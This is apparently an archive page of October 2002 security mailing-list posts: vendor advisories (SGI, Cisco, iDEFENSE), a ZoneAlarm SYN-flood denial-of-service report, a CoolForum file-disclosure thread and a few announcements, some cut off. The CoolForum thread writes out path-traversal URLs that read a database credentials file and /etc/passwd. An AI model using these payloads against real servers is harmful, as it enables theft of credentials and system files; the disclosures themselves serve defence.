RE: Who Need Friends ? IE & MSN expose contact list & other info

2002-10-16 Thread Thor Larholm

This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.

All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.


Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?
http://www.PivX.com

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: 15. oktober 2002 15:05
To: [EMAIL PROTECTED]
Subject: Who Need Friends ? IE & MSN expose contact list & other info




Designing Shellcode Demystified

2002-10-16 Thread Murat Balaban


Hi, 

Here is a paper about shellcode design fundamentals. Available 
both in English and Turkish:


http://www.enderunix.org/docs/en/sc-en.txt  [English]
http://www.enderunix.org/docs/sc-tr.txt [Turkish]


-- 

Murat Balaban
http://www.enderunix.org/



X Windows zlib/MIT-SHM/huge font DoS vulnerabilities

2002-10-16 Thread SGI Security Coordinator

-BEGIN PGP SIGNED MESSAGE-


__
  SGI Security Advisory

Title:   X Windows zlib/MIT-SHM/huge font DoS vulnerabilities
Number:  20021001-01-P
  Date:  October 15, 2002
References:  CVE CAN-2002-164
References:  CVE CVE-2002-0059
References:  CERT CA-2002-07

__

- ---
- --- Issue Specifics ---
- ---

This bulletin covers several graphics-related security issues:

  o  It's been reported that the zlib libraries that ship with x_eoe
 have a "double free" vulnerability.

 See: http://www.kb.cert.org/vuls/id/368819

  o  It's been reported that the IRIX X server has security vulnerabilities.

 1) Under certain conditions, Mozilla can cause the X server to crash.

 See:  http://web.lemuria.org/security/mozilla-dos.html for details.

 2) There is a vulnerability in the MIT-SHM code that can allow a local
user to read or write to any SHM segment.

 See: http://www.linuxsecurity.com/advisories/caldera_advisory-2006.html


SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in future releases of IRIX and with patches.


- --
- --- Impact ---
- --

The X server (/usr/bin/X11/Xsgi) is installed by default on IRIX 6.5 systems
as part of x_eoe.sw.Server.

To determine the version of IRIX you are running, execute the following
command:

  # uname -R

That will return a result similar to the following:

  # 6.5 6.5.16f

The first number ("6.5") is the release name, the second ("6.5.15f" in this
case) is the extended release name.  The extended release name is the
"version" we refer to throughout this document.

Exploitation of these vulnerabilities can result in a root compromise or a
Denial of Service attack.  A local account is required to exploit these
vulnerabilities.

- 
- --- Temporary Workaround ---
- 

There is no good workaround available for these problems if running in
graphical mode is desired.  SGI recommends either upgrading to IRIX 6.5.18
when it is released, or installing the appropriate patch from the listing
below.

If running in graphical mode is not needed, you can execute the command
"/usr/gfx/stopgfx" and it will turn the windowsystem configuration flag off,
kill the X server, and keep it from being restarted on next boot.


- 
- --- Solution ---
- 

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.18 when available, or install the
appropriate patch.

   OS Version Vulnerable? Patch #  Other Actions
   -- --- ---  -
   IRIX 3.xunknown Note 1
   IRIX 4.xunknown Note 1
   IRIX 5.xunknown Note 1
   IRIX 6.0.x  unknown Note 1
   IRIX 6.1unknown Note 1
   IRIX 6.2unknown Note 1
   IRIX 6.3unknown Note 1
   IRIX 6.4unknown Note 1
   IRIX 6.5  yes   Notes 2 & 3
   IRIX 6.5.1yes   Notes 2 & 3
   IRIX 6.5.2yes   Notes 2 & 3
   IRIX 6.5.3yes   Notes 2 & 3
   IRIX 6.5.4yes   Notes 2 & 3
   IRIX 6.5.5yes   Notes 2 & 3
   IRIX 6.5.6yes   Notes 2 & 3
   IRIX 6.5.7yes   Notes 2 & 3
   IRIX 6.5.8yes   Notes 2 & 3
   IRIX 6.5.9yes   Notes 2 & 3
   IRIX 6.5.10   yes   Notes 2 & 3
   IRIX 6.5.11   yes   Notes 2 & 3
   IRIX 6.5.12   yes   Notes 2 & 3
   IRIX 6.5.13m  yes  4709
   IRIX 6.5.13f  yes  4710
   IRIX 6.5.14m  yes  4648
   IRIX 6.5.14f  yes  4649
   IRIX 6.5.15m  yes  4648
   IRIX 6.5.15f  yes  4649
   IRIX 6.5.16m  yes  4663
   IRIX 6.5.16f  yes  4664
   IRIX 6.5.17m  yes  4757
   IRIX 6.5.17f  yes  4758


   NOTES

 1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://

Cisco Security Advisory: Cisco CatOS Embedded HTTP Server Buffer Overflow

2002-10-16 Thread Cisco Systems Product Security Incident Response Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco CatOS Embedded HTTP Server Buffer Overflow

Revision 1.0 FINAL
==

For Public Release 2002 October 16 17:00 (UTC)

- --

Please provide your feedback on this document.

- --

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice
Distribution
Revision History
Cisco Security Procedures

- --

Summary
===

Cisco Catalyst switches running specific versions of Cisco CatOS software are
vulnerable to a buffer overflow in an embedded HTTP server. Only CatOS versions
from 5.4 up to and including 7.3 which contain a "cv" in the image name are
affected. If the HTTP server is enabled a buffer overflow can be remotely
exploited which will cause the switch to fail and reload. The vulnerability can
be exploited repeatedly and result in a denial of service.

Workarounds are available that limit the ability to exploit the vulnerability.
This advisory will be published at 
http://www.cisco.com/warp/public/707/catos-http-overflow-vuln.shtml.

Affected Products
=

This vulnerability is only present in Cisco Catalyst switches running Cisco
CatOS software versions 5.4 through 7.3 that contain an embedded HTTP server to
support CiscoView network management software. The affected software images
contain "cv" in the image name as seen here: cat6000-supcv.5-5-16.bin.

Details
===


If the HTTP server is enabled on a Cisco Catalyst switch running an affected
CiscoView image, an overly long HTTP query can be received by the embedded HTTP
server that will cause a buffer overflow and result in a software reset of the
switch. Once the switch has recovered and has resumed normal processing it is
vulnerable again. It remains vulnerable until the HTTP server is disabled, HTTP
queries to the switch management port are blocked, or the switch's software has
been upgraded to a fixed version.


The HTTP server is disabled by default. It is typically enabled to allow web
based management of the switch using CiscoView. Only a small subset of CatOS
images contain this embedded HTTP server.


This vulnerability is documented as DDTS:
CSCdy26428 - CatOS crash with web server enabled in http_get_token.

Impact
==

The exploitation of this issue can result in a software forced reset of this
device. Repeated exploitation may lead to a denial of service until the
workaround for this vulnerability has been implemented or a fixed version of
software has been loaded onto the device.

Software Versions and Fixes
===

All versions of CatOS software with the embedded HTTP server are vulnerable
prior to the fixed versions listed below. Each row of the table describes a
release train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible releases that
contain the fix and the anticipated date of availability for each are listed in
the Rebuild, Interim, and Maintenance columns. A device running any release in
the given train that is earlier than the release in a specific column (less
than the earliest fixed release) is known to be vulnerable, and it should be
upgraded at least to the indicated release or a later version (greater than the
earliest fixed release label).

When selecting a release, keep in mind the following definitions:

Maintenance
===

Most heavily tested and highly recommended release of any label in a given
row of the table.

Interim
===

Built at regular intervals between maintenance releases and receives less
testing. Interims should be selected only if there is no other suitable
release that addresses the vulnerability, and interim images should be
upgraded to the next available maintenance release as soon as possible.
Interim releases are not available via manufacturing, and usually they are
not available for customer download from CCO without prior arrangement with
the Cisco Technical Assistance Center (TAC).
   

+-+
|  Release  |  Interim   |Maintenance |
|---++|
| 5.x   | 5.5(16.2)  | 5.5(17)|
|---++|
| 6.x   | 6.3(8.3)   | 6.3(9) |
|---++|
| 7.3   | not yet fixed  | not yet fixed  |
|---++|
| 7.4   | 7.4(0.63)  | 7.4(1) |
+-+

Obtaining F

Linux Security Protection System

2002-10-16 Thread Bosko Radivojevic

LinSec team is proud to announce the first stable release of LinSec.

LinSec, as the name says, is Linux Security Protection System. The main aim
of LinSec is to introduce Mandatory Access Control (MAC) mechanism into
Linux (as opposed to existing Discretionary Access Control mechanism).
LinSec model is based on:

* Capabilities
* Filesystem Access Domains
* IP Labeling Lists
* Socket Access Control

As for Capabilities, LinSec heavily extends the Linux native capability
model to allow fine grained delegation of individual capabilities to both
users and programs on the system. No more allmighty root!

Filesystem Access Domain subsystem allows restriction of accessible
filesystem parts for both individual users and programs. Now you can
restrict user activities to only its home, mailbox etc. Filesystem Access
Domains works on device, dir and individual file granularity.

IP Labeling lists enable restriction on allowed network connections on per
program basis. From now on, you may configure your policy so that no one
except your favorite MTA can connect to remote port 25

Socket Access Control model enables fine grained socket access control by
associating, with each socket, a set of capabilities required for a local
process to connect to the socket.

LinSec consists of two parts: kernel patch (currently for 2.4.18) and
userspace tools.

Detailed documentation, download & mailing list information -
http://www.linsec.org




Re: CoolForum v 0.5 beta shows content of PHP files

2002-10-16 Thread David Woods

If the webserver is not chrooted or otherwise protected from escaping a directory all 
files on the system will be potentially readable by an attacker (providing the user 
the webserver runs as has read permissions)

i.e.
http://avatar.php?img=3D../../../../../etc/passwd

David Woods
Solidhouse
http://www.solidhouse.com

On Sat, 12 Oct 2002 15:29:48 +0200
scrap <[EMAIL PROTECTED]> wrote:

> CoolForum v 0.5 beta shows content of PHP files
> The original document can be found at
> http://www.securiteinfo.com/attaques/hacking/coolforum0_5.shtml
> 
> 
> .oO  Overview Oo.
> CoolForum v 0.5 beta shows PHP content files
> Discovered on 2002, September, 16th
> Vendor: http://www.coolforum.net
> 
> CoolForum v 0.5 is a PHP forum. This forum can show content of PHP files.
> 
> 
> .oO  Details Oo.
> This forum contains a file named "avatar.php". This file can show an
> image stored in the "logos" directory. Here is the source file of avatar.php :
> 
>  if (ereg(".jpg",$img))
>header("Content-Type: image/jpeg");
> else if (ereg(".gif",$img))
>header("Content-Type: image/gif");
> header('Expires: 0');
> 
> $fichier=3D"logos/$img";
> 
> $fp=3Dfopen($fichier,"r");
> $image=3Dfread($fp,filesize($fichier));
> fclose($fp);
> 
> echo($image);
> ?>
> 
> What this file do ? It's simple : It takes the name of the file as argument,
> read it fully, and send back the content to your browser.
> The security flaw is that *any* file, in or *out* the logos directory can be
> show, bypassing *any* protected directories...
> 
> 
> .oO  Exploit Oo.
> The exploit is really easy. The aim is to read the "connect.php" file in the
> "secret" directory. "connect.php" contains the informations about the
> database connection and "secret" directory is protected by a .htaccess file.
> You can do the exploit with any browser by using this syntax :
> http://avatar.php?img=3D../secret/connect.php
> Of course, replace  by the vulnerable server.
> You will get a blank page. If you edit the source of this web page, you'll
> get the jackpot...
> 
> 
> .oO  Solution Oo.
> The vendor has been informed and has solved the problem.
> Download CoolForum 0.5.1 or newer at :
> http://www.coolforum.net/index.php?p=dlcoolforum
> 
> 
> 
> .oO  Discovered by Oo.
> Arnaud Jacques aka scrap
> [EMAIL PROTECTED]
> http://www.securiteinfo.com
> 
> 



NSSI-2002-zonealarm3: ZoneAlarm Pro Denial of Service Vulnerability

2002-10-16 Thread Abraham Lincoln

NSSI Technologies Inc Research Labs Security Advisory 

http://www.nssolution.com (Philippines / .ph) 

"Maximum e-security" 

http://nssilabs.nssolution.com

ZoneAlarm Pro 3.1 and 3.0 Denial of Service Vulnerability

Author: Abraham Lincoln Hao / SunNinja

e-Mail: [EMAIL PROTECTED] / [EMAIL PROTECTED]

Advisory Code: NSSI-2002-zonealarm3 

Tested: Under Win2k Advance Server with SP3 / WinNT 4.0 with SP6a / Win2K Professional 
/ WinNT 4.0 workstation 

Vendor Status:  Zone Labs is already contacted 1 month ago and they informed me that 
they going to release an update or new version to patched the problem. This 
vulnerability is confirmed by the vendor.

Vendors website: http://www.zonelabs.com

Severity: High

Overview:

 New ZoneAlarm® Pro delivers twice the security—Zone Labs’ award-winning, personal 
firewall trusted by millions, plus advanced privacy features. the award-winning PC 
firewall that blocks intrusion attempts and protects against Internet-borne threats 
like worms, Trojan horses, and spyware.   

 ZoneAlarm Pro 3.1 and 3.0  doubles your protection with enhanced Ad Blocking and 
expanded Cookie Control to speed up your Internet experience and stop Web site spying. 
Get protected. Compatible with Microsoft® Windows® 98/Me/NT/2000 and XP.

ZoneAlarm Pro 3.1.291 and 3.0  contains vulnerability that would let the attacker 
consume all your CPU and Memory usage that would result to Denial of Service Attack 
through sending  multiple syn packets / synflooding.  

Details:

Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 contains a vulnerability that would let 
the attacker consume all your CPU and Memory usage that would result to Denial of 
Service Attack through Synflooding that would cause the machine to stop from 
responding. Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 is also vulnerable with IP 
Spoofing. This Vulnerabilities are confirmed from the vendor.

Test diagram:

   [*Nix b0x with IP Spoofing scanner / Flooder] <===[10/100mbps switch===> [Host with 
ZoneAlarm] 

 1] Tested under default install of the 2 versions after sending minimum of 300 Syn 
Packets to port 1-1024 the machine will hang-up until the attack stopped.

2] We configured the ZoneAlarm firewall both version to BLOCK ALL traffic setting 
after sending a minimum of 300 Syn Packets to port  1-1024 the machine will hang-up 
until the attack stopped. 

Workaround:

Disable ZoneAlarm and Hardened TCP/IP stack of your windows and Install latest 
Security patch.

Note: To people who's having problem reproducing the vulnerability let me know :)

Any Questions? Suggestions? or Comments? let us know. 

e-mail: [EMAIL PROTECTED] / [EMAIL PROTECTED] / [EMAIL PROTECTED]

 

greetings:
   nssilabs team, especially to b45h3r and rj45, Most skilled and pioneers of NSSI 
good luck!. ([EMAIL PROTECTED] / [EMAIL PROTECTED]),  Lawless the saint ;), dig0, 
p1x3l, dc and most of all to my Lorie.  
-- 
__
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup




iDEFENSE Security Advisory 10.16.02: Denial of Service in Sabre Desktop Reservation Client for Windows

2002-10-16 Thread David Endler

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDEFENSE Security Advisory 10.16.02:
http://www.idefense.com/advisory/10.16.02.txt
Denial of Service in Sabre Desktop Reservation Client for Windows
October 16, 2002

I. BACKGROUND

Sabre Inc.’s Desktop Reservation Software for Windows is a legacy
travel agency program that has since been replaced by Sabre eVoya
software. However, several travel agencies and major airline travel
call centers still use this software.

II. DESCRIPTION

Sabre Desktop Reservation Software for Windows has a component called
Sabserv (listening on TCP port 1001) that connects the client
application to the communication components and eventually to the
local Sabre gateway at the local site. If Sabserv is sent arbitrary
data on TCP port 1001 that it does not understand, it will stop
functioning within one minute, usually. The client application will
no longer have access to Sabre or the gateway. The gateway
application is unaffected by this vulnerability and all other users
on the local system will continue to have connectivity.

III. ANALYSIS

Local exploitation at an airline call center or travel agency could
potentially slow or halt production. Under heavy load, the client
will lock up, thereby forcing a reboot. This causes a loss of
productivity, particularly in a high-volume call center. Automated
ticketing systems running this client can be crashed as well. Since
some companies using this software may not regularly monitor such
events, they could miss ticketing deadlines, thereby having to pay
out of pocket for ticket price changes or penalties

IV. DETECTION

This issue was tested on Sabre Desktop Reservation Software for
Windows 4.2, 4.3, and 4.4 on Windows 95 and 98SE, with all the latest
patches installed.

V. RECOVERY

Restarting the application should restore normal functionality.

VI. VENDOR FIX/RESPONSE

Sabre responded with the following statement:

"Sabserv will be updated to ignore data it does not understand as
part of the next maintenance upgrade to Sabre Desktop Reservation
Software for Windows. This will prevent the denial of service
condition within the client application when arbitrary data is sent
to port 1001."

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-1191 to this issue.

VIII. DISCLOSURE TIMELINE

07/26/2002  Issue disclosed to iDEFENSE
08/26/2002  Disclosed to vendor via e-mail to [EMAIL PROTECTED]
08/26/2002  Disclosed to iDEFENSE clients
09/03/2002  Second attempt at e-mail contact
09/15/2002  Call to Sabre technical support rep N2H, referred to
customer support representative
09/20/2002  Fourth attempt at contact ([EMAIL PROTECTED])
09/23/2002  Response received from Leslie Price
09/23/2002  Response received from Jeff Harmon ([EMAIL PROTECTED])
10/10/2002  Coordinated public disclosure

IX. CREDIT

Altomo ([EMAIL PROTECTED]) is credited with discovering this
vulnerability.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence and
decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

[EMAIL PROTECTED]
www.idefense.com


-BEGIN PGP SIGNATURE-
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPa1yXUrdNYRLCswqEQITlwCfV3Ap77m8vUPKTYO1Yli3P2s+VTgAoOHK
J4ZiqHNEVt6Hsaz2SPlvCfFV
=8mlZ
-END PGP SIGNATURE-